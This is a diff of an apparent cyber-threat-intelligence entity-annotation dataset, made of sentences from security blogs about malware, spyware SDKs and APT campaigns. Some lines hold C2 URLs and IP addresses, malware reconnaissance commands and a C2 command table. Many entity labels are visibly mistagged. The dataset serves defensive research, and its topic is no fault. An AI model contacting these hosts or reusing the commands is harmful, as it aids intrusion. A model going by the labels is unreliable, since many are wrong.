diff --git "a/train.jsonl" "b/train.jsonl" --- "a/train.jsonl" +++ "b/train.jsonl" @@ -1,8813 +1,6812 @@ -{"id":932,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":933,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":934,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":935,"text":"Mobile app creators are often looking for ways to monetize their software.","entities":[],"relations":[],"Comments":[]} -{"id":936,"text":"One of the most common ways to do this is by displaying advertisements to users or by offering in-app purchases (IAPs).","entities":[],"relations":[],"Comments":[]} -{"id":937,"text":"Mobile monetization platforms create software libraries that authors can embed into their apps to start earning money quickly.","entities":[],"relations":[],"Comments":[]} -{"id":938,"text":"We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.","entities":[],"relations":[],"Comments":[]} -{"id":939,"text":" While not all SMS-based IAP applications steal user data, we recently identified that the Chinese Taomike SDK has begun capturing copies of all messages received by the phone and sending them to a Taomike controlled server.","entities":[{"id":46449,"label":"location","start_offset":91,"end_offset":98},{"id":44904,"label":"attack-pattern","start_offset":42,"end_offset":57},{"id":44905,"label":"malware","start_offset":99,"end_offset":110},{"id":44907,"label":"Infrastucture","start_offset":198,"end_offset":223}],"relations":[{"id":37,"from_id":44905,"to_id":44907,"type":"exfiltrates-to"},{"id":38,"from_id":44905,"to_id":44907,"type":"communicates-with"},{"id":190,"from_id":44905,"to_id":46449,"type":"located-at"},{"id":191,"from_id":44905,"to_id":44904,"type":"uses"}],"Comments":[]} -{"id":940,"text":"Since August 1, Palo Alto Networks WildFire has captured over 18,000 Android apps that contain this library.","entities":[{"id":46451,"label":"TIME","start_offset":6,"end_offset":14},{"id":46450,"label":"identity","start_offset":16,"end_offset":43},{"id":46452,"label":"SOFTWARE","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} -{"id":941,"text":"These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.","entities":[{"id":46453,"label":"SOFTWARE","start_offset":37,"end_offset":54},{"id":46454,"label":"location","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} -{"id":942,"text":"Background WildFire captures many samples of mobile malware that intercept and upload SMS messages.","entities":[{"id":44908,"label":"identity","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} -{"id":943,"text":"Most of these are created by malware authors who set up command and control (C2) servers with third party hosting providers and frequently update their locations to avoid detection.","entities":[],"relations":[],"Comments":[]} -{"id":944,"text":" Among these malware we have found many that are created by “mobile monetization” companies who distribute apps that provide little value but have a high cost to the user.","entities":[],"relations":[],"Comments":[]} -{"id":945,"text":"These apps are often installed by tricking users into clicking a pop-up, only to find later that a charge has appeared on their phone bill.","entities":[{"id":44909,"label":"attack-pattern","start_offset":34,"end_offset":48}],"relations":[],"Comments":[]} -{"id":946,"text":"Antivirus programs typically identify these apps as malware, the topic of this blog is something different and harder to detect.","entities":[],"relations":[],"Comments":[]} -{"id":947,"text":" Taomike is a Chinese company that aims to become the biggest mobile advertisement solution platform in China.","entities":[{"id":46455,"label":"identity","start_offset":1,"end_offset":8},{"id":46456,"label":"location","start_offset":14,"end_offset":21},{"id":46457,"label":"location","start_offset":104,"end_offset":109}],"relations":[{"id":192,"from_id":46455,"to_id":46456,"type":"located-at"}],"Comments":[]} -{"id":948,"text":"They provide an SDK and services to help developers display rich advertisements with a high pay rate.","entities":[],"relations":[],"Comments":[]} -{"id":949,"text":"Taomike has not previously been associated with malicious activity, but a recent update to their software added SMS theft functionality.","entities":[{"id":46458,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":950,"text":"The apps this library is embedded in may be legitimate and have significant functionality, but their developer’s choice to use this library has put them at risk. Technical Details:","entities":[],"relations":[],"Comments":[]} -{"id":951,"text":"SMS Theft ","entities":[{"id":44910,"label":"attack-pattern","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":952,"text":"Not all apps that use the Taomike library steal SMS messages.","entities":[{"id":46459,"label":"identity","start_offset":26,"end_offset":33},{"id":46460,"label":"attack-pattern","start_offset":42,"end_offset":60}],"relations":[{"id":193,"from_id":46459,"to_id":46460,"type":"uses"}],"Comments":[]} -{"id":953,"text":"Our analysis indicates that only samples that contain the embedded URL, hxxp:\/\/112.126.69.51\/2c.php have this functionality.","entities":[{"id":46461,"label":"URL","start_offset":72,"end_offset":99}],"relations":[],"Comments":[]} -{"id":954,"text":"This is the URL to which the software uploads SMS messages, and the IP address belongs to the Taomike API server used by other Taomike services.","entities":[{"id":46462,"label":"identity","start_offset":127,"end_offset":134},{"id":44911,"label":"Infrastucture","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} -{"id":955,"text":"We have captured around 63,000 Android apps in WildFire that include the Taomike library but only around 18,000 include the SMS theft functionality.","entities":[{"id":2996,"label":"SOFTWARE","start_offset":47,"end_offset":55},{"id":46463,"label":"identity","start_offset":73,"end_offset":80},{"id":46464,"label":"attack-pattern","start_offset":124,"end_offset":133}],"relations":[],"Comments":[]} -{"id":956,"text":" We believe there are different versions of the Taomike SDK and only some of them include SMS uploading behavior.","entities":[{"id":46465,"label":"identity","start_offset":50,"end_offset":57}],"relations":[],"Comments":[]} -{"id":957,"text":"Based on our data, the version that contains the SMS stealing functions is newer and was released around August 2015.","entities":[{"id":44912,"label":"TIME","start_offset":105,"end_offset":116},{"id":44913,"label":"attack-pattern","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} -{"id":958,"text":"Apps that use earlier versions of the library appear to be safe.","entities":[],"relations":[],"Comments":[]} -{"id":959,"text":" The Taomike library is called “zdtpay” and is a component of Taomike’s IAP system. Because Android apps are required to list the permissions they need in their manifest file, we can see that this library requires both SMS and network related permissions.","entities":[{"id":46467,"label":"SOFTWARE","start_offset":62,"end_offset":82},{"id":46468,"label":"SOFTWARE","start_offset":93,"end_offset":100},{"id":46466,"label":"identity","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} -{"id":960,"text":"The library also registers a receiver named com.zdtpay.Rf2b for both the SMS_RECEIVED and BOOT_COMPLETED actions with highest priority of 2147483647.","entities":[],"relations":[],"Comments":[]} -{"id":961,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} -{"id":962,"text":"Registered receiver for SMS_RECEIVED The registered receiver Rf2b reads SMS messages whenever they arrive.","entities":[],"relations":[],"Comments":[]} -{"id":963,"text":"The message body and sender phone number are collected as shown in Figure 2. Figure 2.","entities":[],"relations":[],"Comments":[]} -{"id":964,"text":"SMS body and sender number read ","entities":[],"relations":[],"Comments":[]} +{"id":11709,"text":"Malicious version of My First APP, which adds Metasploit SideWinder has used malicious apps as part of its operation before.","entities":[{"id":36090,"label":"malware","start_offset":46,"end_offset":56},{"id":36091,"label":"threat-actor","start_offset":61,"end_offset":71}],"relations":[],"Comments":[]} +{"id":4382,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":13145,"label":"threat-actor","start_offset":25,"end_offset":40},{"id":50195,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":12581,"text":"This looked similar to an earlier in-the-wild iOS vulnerability analyzed by Ian Beer of Google Project Zero.","entities":[],"relations":[],"Comments":[]} +{"id":11292,"text":"We need to request that a download link be generated for the collected files with the \u201ctrendmicro-visionone-download-information-for-collected-forensic-file\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":13494,"text":"Some malicious actors, such as ransomware operators, earn directly from their cyberattacks.","entities":[],"relations":[],"Comments":[]} +{"id":5386,"text":"We have evidence that the routers of at least one vendor other than Asus and WatchGuard are connecting to Cyclops Blink C&Cs as well, but so far we have been unable to collect malware samples for this router brand.","entities":[{"id":51380,"label":"malware","start_offset":106,"end_offset":119}],"relations":[],"Comments":[]} +{"id":3889,"text":"They should also exercise an incident response plan and Implement regular data backup procedures on both IT and OT networks.","entities":[],"relations":[],"Comments":[]} +{"id":7302,"text":"It collects the following information from the infected system by invoking the following commands: Command Description system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Processor \/ {split($0,line,\\\":\\\"); printf(\\\"%s\\\",line[2]);}' Get processor information 15f20 = system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Memory\/ {split($0,line, \\\":\\\"); printf(\\\"%s\\\", line[2]);}'","entities":[],"relations":[],"Comments":[]} +{"id":14275,"text":"...","entities":[],"relations":[],"Comments":[]} +{"id":3040,"text":"Many apps these days have auto-update capabilities.","entities":[],"relations":[],"Comments":[]} +{"id":12391,"text":"We terminated 4 YouTube channels as part of our actions against a coordinated influence operation.","entities":[],"relations":[],"Comments":[]} +{"id":4,"text":" The first known campaign was launched by Crimeware on November 2014.","entities":[{"id":45806,"label":"TIME","start_offset":55,"end_offset":68},{"id":48942,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} +{"id":4052,"text":"By using existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.","entities":[],"relations":[],"Comments":[]} +{"id":13297,"text":"The TSSL project has 64-bit version.","entities":[{"id":41403,"label":"identity","start_offset":24,"end_offset":27}],"relations":[],"Comments":[]} +{"id":10074,"text":"Trend Micro's Zero-Day Initiative (ZDI) provided technical analysis of recently patched vulnerabilities in the SolarWinds Orion Platform.","entities":[],"relations":[],"Comments":[]} +{"id":11791,"text":"APT35 has relied on this technique since 2017 \u2014 targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":36358,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":36360,"label":"location","start_offset":93,"end_offset":101},{"id":36362,"label":"location","start_offset":137,"end_offset":140},{"id":36363,"label":"location","start_offset":141,"end_offset":149},{"id":36364,"label":"location","start_offset":150,"end_offset":158}],"relations":[],"Comments":[]} +{"id":4717,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups\u2019s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50611,"label":"TIME","start_offset":3,"end_offset":7},{"id":50612,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50614,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50613,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50615,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} +{"id":5525,"text":"They involve a hacker deploying malicious code known as Magecart to an organization\u2019s website.","entities":[{"id":51529,"label":"malware","start_offset":56,"end_offset":64}],"relations":[],"Comments":[]} +{"id":863,"text":"They\u2019ve certainly caused a wealth of damage to end users with some of the more prominent malware families, such as CryptoLocker, CryptoWall, TorrentLocker, and TeslaCrypt infecting millions of users overall.","entities":[{"id":46398,"label":"malware","start_offset":160,"end_offset":170},{"id":46399,"label":"malware","start_offset":141,"end_offset":154},{"id":46400,"label":"malware","start_offset":129,"end_offset":139},{"id":46401,"label":"malware","start_offset":115,"end_offset":128}],"relations":[],"Comments":[]} +{"id":997,"text":" These accounts, which include an education (EDU) top-level domain email address with valid password, represent 42 of the world\u2019s top universities, across 10 countries: ","entities":[],"relations":[],"Comments":[]} +{"id":8571,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":26488,"label":"location","start_offset":11,"end_offset":15},{"id":26490,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} +{"id":6470,"text":"The command is connected to 187.236.212[.]184 and downloads a file called SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\\programdata directory.","entities":[{"id":20109,"label":"IPV4","start_offset":28,"end_offset":45},{"id":20110,"label":"location","start_offset":46,"end_offset":49},{"id":20111,"label":"SHA1","start_offset":99,"end_offset":163},{"id":20112,"label":"location","start_offset":165,"end_offset":168}],"relations":[],"Comments":[]} +{"id":5936,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":18253,"label":"location","start_offset":144,"end_offset":148},{"id":18255,"label":"location","start_offset":236,"end_offset":239},{"id":18256,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} +{"id":2714,"text":"Palo Alto Networks enterprise security platform is focused on providing an integrated approach to detecting and preventing advanced threats across each step in the attack kill-chain.","entities":[{"id":47954,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} +{"id":8265,"text":"The new emails used more common phishing tactics, such as alleged requests for payment confirmation.","entities":[{"id":25515,"label":"attack-pattern","start_offset":32,"end_offset":40}],"relations":[],"Comments":[]} +{"id":7793,"text":"Suspicious activity using ServHelper A campaign targeting China spoofed FedEx-themed emails with subjects pertaining to delivery problems, failures, or notifications.","entities":[{"id":24138,"label":"malware","start_offset":26,"end_offset":36},{"id":24139,"label":"location","start_offset":39,"end_offset":47}],"relations":[],"Comments":[]} +{"id":9513,"text":"This malware and PuppetLoader\u2019s decrypted Loader.dlls share similar strings such as \u201c[-] UnExist pwszModuleFunName:\u201d.","entities":[{"id":29189,"label":"location","start_offset":13,"end_offset":16},{"id":29190,"label":"malware","start_offset":17,"end_offset":29}],"relations":[],"Comments":[]} +{"id":42,"text":"It shows the price that a criminal enterprise called IFRAME DOLLARS was charging to infect computers in various countries at that time.","entities":[{"id":44577,"label":"threat-actor","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} +{"id":1982,"text":" Figure 5: WinDBG view of call stack when lsass.exe process crashes due to exploitation Vulnerable code is found in the CSsl3TlsClientContext::DigestServerHelloVerifyRequest function: Palo Alto Networks is releasing signature 37094 and 37059 to defend against these vulnerabilities.","entities":[{"id":47094,"label":"SOFTWARE","start_offset":11,"end_offset":17},{"id":47095,"label":"identity","start_offset":186,"end_offset":204}],"relations":[],"Comments":[]} +{"id":4840,"text":"To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.","entities":[{"id":50794,"label":"attack-pattern","start_offset":61,"end_offset":74},{"id":50795,"label":"location","start_offset":90,"end_offset":95},{"id":50797,"label":"location","start_offset":113,"end_offset":133},{"id":50796,"label":"location","start_offset":97,"end_offset":103}],"relations":[],"Comments":[]} +{"id":5349,"text":"If a command targets the core component, it can be one of the following: Command ID Action 0 Terminates the program 1 Bypasses the data-sending interval and sends data to C&C servers immediately 2 Adds a new C&C server to the list in memory 3 Sets time to send the next packet to the C&C server 4 Sets time to send the next packet to the C&C server 5 Adds a new module (an ELF file should be received following the command)","entities":[],"relations":[],"Comments":[]} +{"id":11636,"text":"While tracking the activities of the SideWinder group, which has become infamous for targeting the South Asia region and its surrounding countries, we identified a server used to deliver a malicious LNK file and host multiple credential phishing pages.","entities":[{"id":35704,"label":"location","start_offset":110,"end_offset":116},{"id":35705,"label":"location","start_offset":117,"end_offset":120},{"id":35706,"label":"location","start_offset":208,"end_offset":211},{"id":35707,"label":"location","start_offset":212,"end_offset":216},{"id":35708,"label":"attack-pattern","start_offset":237,"end_offset":245}],"relations":[],"Comments":[]} +{"id":3597,"text":"The different samples organized name, payload delivered and the fully-undetectable stages where the attribute \u201cKurdishCoderProduction\u201d is present","entities":[],"relations":[],"Comments":[]} +{"id":249,"text":"A cybersquatting domain save-russia[.]today is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44656,"label":"attack-pattern","start_offset":2,"end_offset":16},{"id":44657,"label":"DOMAIN","start_offset":24,"end_offset":43},{"id":44658,"label":"attack-pattern","start_offset":57,"end_offset":68},{"id":44659,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":9,"from_id":44658,"to_id":44659,"type":"targets"},{"id":114,"from_id":44656,"to_id":44657,"type":"uses"},{"id":115,"from_id":44658,"to_id":44657,"type":"uses"}],"Comments":[]} +{"id":2375,"text":"We initially observed StealthVector, a shellcode loader written in C\/C++, in October 2020.","entities":[{"id":47437,"label":"malware","start_offset":22,"end_offset":35},{"id":47438,"label":"TIME","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} +{"id":13546,"text":"This script is likely activated by exploiting a cross-site scripting (XSS) vulnerability in the said store\u2019s administration portal.","entities":[{"id":51622,"label":"SOFTWARE","start_offset":101,"end_offset":130},{"id":51623,"label":"malware","start_offset":5,"end_offset":11},{"id":51621,"label":"attack-pattern","start_offset":48,"end_offset":74}],"relations":[{"id":1115,"from_id":51623,"to_id":51622,"type":"targets"},{"id":1116,"from_id":51623,"to_id":51621,"type":"uses"}],"Comments":[]} +{"id":1505,"text":" The backdoor when run will create threads for each connection listed in its config file. The sample that was caught by our systems contains 3 IP addresses in its config file.","entities":[],"relations":[],"Comments":[]} +{"id":14111,"text":"Based on our analysis, we believe the malware author did not fake the compile times of the binaries.","entities":[],"relations":[],"Comments":[]} +{"id":3975,"text":"Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro\u2019s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection.","entities":[{"id":49836,"label":"identity","start_offset":114,"end_offset":125}],"relations":[],"Comments":[]} +{"id":10875,"text":"Date of submission SHA256 Identified C&C servers Additional Details August 2, 2019 374d92f553c28e9dad1aa7f5d334a07dede1e5ad19c3766efde74290d0c49afb upeg-system-app[.]com Likely repacked from Kingoroot.","entities":[{"id":33101,"label":"location","start_offset":0,"end_offset":4},{"id":33103,"label":"SHA1","start_offset":88,"end_offset":152},{"id":33104,"label":"location","start_offset":177,"end_offset":183}],"relations":[],"Comments":[]} +{"id":4684,"text":"Process process = new Process(); process.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text); process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName; process.Start();","entities":[],"relations":[],"Comments":[]} +{"id":2114,"text":"On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.","entities":[{"id":47248,"label":"TIME","start_offset":3,"end_offset":18},{"id":47249,"label":"vulnerability","start_offset":82,"end_offset":95},{"id":47252,"label":"SOFTWARE","start_offset":145,"end_offset":199},{"id":47250,"label":"vulnerability","start_offset":99,"end_offset":134}],"relations":[{"id":311,"from_id":47252,"to_id":47249,"type":"has"},{"id":312,"from_id":47252,"to_id":47250,"type":"has"}],"Comments":[]} +{"id":3640,"text":"Carrying out a successful conversation hijacking spear phishing attack requires knowing someone that the ultimate target is communicating with, compromising that person\u2019s account, identifying an ongoing email conversation with the ultimate target, crafting an email to appear part of that ongoing email conversation and finally sending it.","entities":[{"id":49421,"label":"attack-pattern","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} +{"id":2898,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 14)]","entities":[],"relations":[],"Comments":[]} +{"id":5443,"text":"There were 24.5 billion mobile banking transactions while there were 20.6 billion PC-based transactions.","entities":[],"relations":[],"Comments":[]} +{"id":1727,"text":" Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} +{"id":15,"text":"We found 147 new unique pieces of malware today alone, two of them fully undetectable by the legacy security solutions in VirusTotal and most of them barely detected by one vendor (few have 4\/57 detection rate).","entities":[{"id":44574,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} +{"id":1783,"text":"Leave a comment below let us know what you think.","entities":[],"relations":[],"Comments":[]} +{"id":726,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) On Sept. 14, 2021, Microsoft\u2019s Security Response Center (MSRC) released security patches detailing the findings of four critical vulnerabilities affecting the Microsoft Azure package Open Management Infrastructure (OMI).","entities":[{"id":46298,"label":"TIME","start_offset":56,"end_offset":70},{"id":44843,"label":"identity","start_offset":72,"end_offset":115},{"id":44844,"label":"SOFTWARE","start_offset":212,"end_offset":272}],"relations":[],"Comments":[]} +{"id":1026,"text":"Navigating to CNRI\u2019s webmail page, we were then able to successfully access and send an email from that account.","entities":[{"id":46517,"label":"identity","start_offset":14,"end_offset":18}],"relations":[],"Comments":[]} +{"id":1762,"text":"If an attacker could modify it, then any script can be run, such as downloading and executing a PE file, without any notification or alert.","entities":[],"relations":[],"Comments":[]} +{"id":10555,"text":"The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.","entities":[{"id":32182,"label":"tools","start_offset":4,"end_offset":8},{"id":32183,"label":"location","start_offset":71,"end_offset":75},{"id":32184,"label":"location","start_offset":83,"end_offset":87},{"id":32185,"label":"location","start_offset":89,"end_offset":92}],"relations":[],"Comments":[]} +{"id":8760,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":2777,"text":"These new drive-by attacks focus on hijacking the computational resources of the victim\u2019s computer to \u201cmine\u201d cryptocurrency on behalf of the attackers.","entities":[{"id":48006,"label":"attack-pattern","start_offset":36,"end_offset":73}],"relations":[],"Comments":[]} +{"id":2601,"text":"For example, in the \u201cproof\u201d of the Okta breach posted on the Lapsus$ Group\u2019s Telegram channel, the actor states: \u201c\u2026 our focus was ONLY on okta customers\u201d (Figure 3)","entities":[{"id":45614,"label":"identity","start_offset":138,"end_offset":142},{"id":45611,"label":"identity","start_offset":35,"end_offset":39},{"id":45612,"label":"threat-actor","start_offset":61,"end_offset":68},{"id":45613,"label":"SOFTWARE","start_offset":77,"end_offset":85}],"relations":[{"id":360,"from_id":45612,"to_id":45611,"type":"targets"}],"Comments":[]} +{"id":5616,"text":"Once launched, it contacts a command and control server hosted in China using an HTTP GET request to the following website to register the infection with the attacker: http:\/\/14.17.95.205:21910\/my\/service.php.","entities":[{"id":17280,"label":"location","start_offset":37,"end_offset":40},{"id":17282,"label":"location","start_offset":126,"end_offset":134},{"id":17283,"label":"URL","start_offset":168,"end_offset":208}],"relations":[],"Comments":[]} +{"id":3181,"text":" Infection chain ","entities":[],"relations":[],"Comments":[]} +{"id":3307,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} +{"id":11676,"text":"We found several interesting dynamic DNS domains resolving to a server that was used to deliver SideWinder\u2019s malicious documents.","entities":[],"relations":[],"Comments":[]} +{"id":5199,"text":"Vulnerabilities in the standard specification","entities":[],"relations":[],"Comments":[]} +{"id":10248,"text":"Yet this is not always enough to hide these activities.","entities":[],"relations":[],"Comments":[]} +{"id":5531,"text":"Magecart attacks get around that.","entities":[{"id":51530,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":13408,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[],"relations":[],"Comments":[]} +{"id":13240,"text":"UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe.","entities":[{"id":41285,"label":"location","start_offset":16,"end_offset":20},{"id":41286,"label":"malware","start_offset":31,"end_offset":40},{"id":41287,"label":"location","start_offset":54,"end_offset":58},{"id":41288,"label":"location","start_offset":71,"end_offset":74},{"id":41289,"label":"location","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} +{"id":7238,"text":"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u201cguest\u201d posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.","entities":[{"id":22622,"label":"threat-actor","start_offset":26,"end_offset":29},{"id":22623,"label":"location","start_offset":30,"end_offset":33},{"id":22624,"label":"location","start_offset":147,"end_offset":155},{"id":22625,"label":"location","start_offset":169,"end_offset":175},{"id":22626,"label":"location","start_offset":233,"end_offset":241}],"relations":[],"Comments":[]} +{"id":13765,"text":"The API address table.","entities":[],"relations":[],"Comments":[]} +{"id":5378,"text":"The following data is obtained from an infected device: The Linux version, which the module gets by calling the uname() function and \/etc\/issue file Information about the device\u2019s memory consumption, which it gets by calling the sysinfo() function The SSD storage information, which it gets by calling the statvfs() function The content of the following files: \/etc\/passwd \/etc\/group \/proc\/mounts \/proc\/partitions Information about the network interfaces, which it gets by calling the if_nameindex() and iotctl() functions with the SIOCGIFHWADDR and SIOCGIFADDR commands.","entities":[{"id":51372,"label":"FILEPATH","start_offset":136,"end_offset":146},{"id":51374,"label":"FILEPATH","start_offset":382,"end_offset":392},{"id":51375,"label":"FILEPATH","start_offset":395,"end_offset":407},{"id":51376,"label":"FILEPATH","start_offset":409,"end_offset":425},{"id":51373,"label":"FILEPATH","start_offset":370,"end_offset":381}],"relations":[],"Comments":[]} +{"id":2031,"text":" The HelloXD author(s) did modify the infamous file marker and mutex however, opting for dxunmgqehhehyrhtxywuhwrvzxqrcblo as the file marker and With best wishes And good intentions\u2026 as the mutex (Figure 9).","entities":[{"id":47130,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} +{"id":3242,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} +{"id":12908,"text":"A general detection indicates that something was deemed suspicious, but it was not assigned to a specific tactic or technique.","entities":[],"relations":[],"Comments":[]} +{"id":10570,"text":"Upon reviewing phishing attempts since the beginning of this year, we\u2019ve seen a rising number of attackers, including those from Iran and North Korea, impersonating news outlets or journalists.","entities":[{"id":32243,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":32246,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} +{"id":518,"text":"Figure 3 shows ransomware arrives via different application protocols.","entities":[],"relations":[],"Comments":[]} +{"id":7232,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity through the Chrome Vulnerabilities Rewards Program submission process.","entities":[],"relations":[],"Comments":[]} +{"id":3285,"text":"The script used to download OBS Studio, prepare the configuration, and start the process ScreenShot","entities":[{"id":48379,"label":"SOFTWARE","start_offset":28,"end_offset":38}],"relations":[],"Comments":[]} +{"id":14342,"text":"It disguised itself as the adult game named after an adult film actress.","entities":[],"relations":[],"Comments":[]} +{"id":5499,"text":"Compared to Patchwork, whose Trojanized documents exploit at least five security flaws, Confucius\u2019 backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882.","entities":[{"id":51507,"label":"attack-pattern","start_offset":144,"end_offset":172},{"id":51504,"label":"threat-actor","start_offset":88,"end_offset":97},{"id":51503,"label":"threat-actor","start_offset":12,"end_offset":21},{"id":51505,"label":"vulnerability","start_offset":189,"end_offset":202},{"id":51506,"label":"vulnerability","start_offset":207,"end_offset":221}],"relations":[{"id":1100,"from_id":51504,"to_id":51507,"type":"uses"}],"Comments":[]} +{"id":10179,"text":"The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.","entities":[{"id":31070,"label":"location","start_offset":23,"end_offset":31},{"id":31072,"label":"location","start_offset":113,"end_offset":117},{"id":31073,"label":"location","start_offset":124,"end_offset":130},{"id":31074,"label":"malware","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} +{"id":6989,"text":"We have observed that the Remote Desktop Protocol (RDP) certificate associated in this deployment, \u201cWIN-P9NRMH5G6M8,\u201d is a common string found in previously identified Earth Karkaddan C&C servers.","entities":[{"id":21886,"label":"attack-pattern","start_offset":26,"end_offset":49},{"id":21887,"label":"malware","start_offset":51,"end_offset":54}],"relations":[],"Comments":[]} +{"id":1272,"text":" Figure 5. Error message generated by Adobe.exe ","entities":[{"id":44960,"label":"FILEPATH","start_offset":38,"end_offset":47}],"relations":[],"Comments":[]} +{"id":2854,"text":"Register for Ignite \u201917 Security Conference Vancouver, BC June 12\u201315, 2017 ","entities":[{"id":48060,"label":"location","start_offset":45,"end_offset":58},{"id":48061,"label":"TIME","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} +{"id":3886,"text":"It also identifies how dependencies between an enterprise's IT and OT systems can give attackers a path.","entities":[],"relations":[],"Comments":[]} +{"id":9997,"text":"Scans the system\u2019s Windows version and computer name m.exe Custom Mimikatz (including 32bit \/ 64bit file)","entities":[{"id":30517,"label":"location","start_offset":35,"end_offset":38},{"id":30518,"label":"malware","start_offset":66,"end_offset":74}],"relations":[],"Comments":[]} +{"id":8130,"text":"All of this happens behind the overlay screen, unbeknownst to the user.","entities":[],"relations":[],"Comments":[]} +{"id":4931,"text":"This is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers.","entities":[{"id":50948,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} +{"id":11391,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} +{"id":4945,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":50970,"label":"attack-pattern","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} +{"id":14291,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":196,"text":" DDoS Attacks Impacting Ukrainian Government and Banking Institutions HermeticWiper Malware Website Defacement Rise in Phishing and Scam Attacks Increase in Cybersquatting Trends Fake Donation Websites DoS Attacks on Ukrainian News Sites Distribution of Apps How Palo Alto Networks Is Working to Keep You Safe How You Should Prepare for an Increase in Cyberthreats Such as Wipers, DDoS, Website Defacement and Other Related Attacks How Unit 42 Threat Intelligence and Security Consulting Can Help Additional Cybersecurity Resources Indicators of 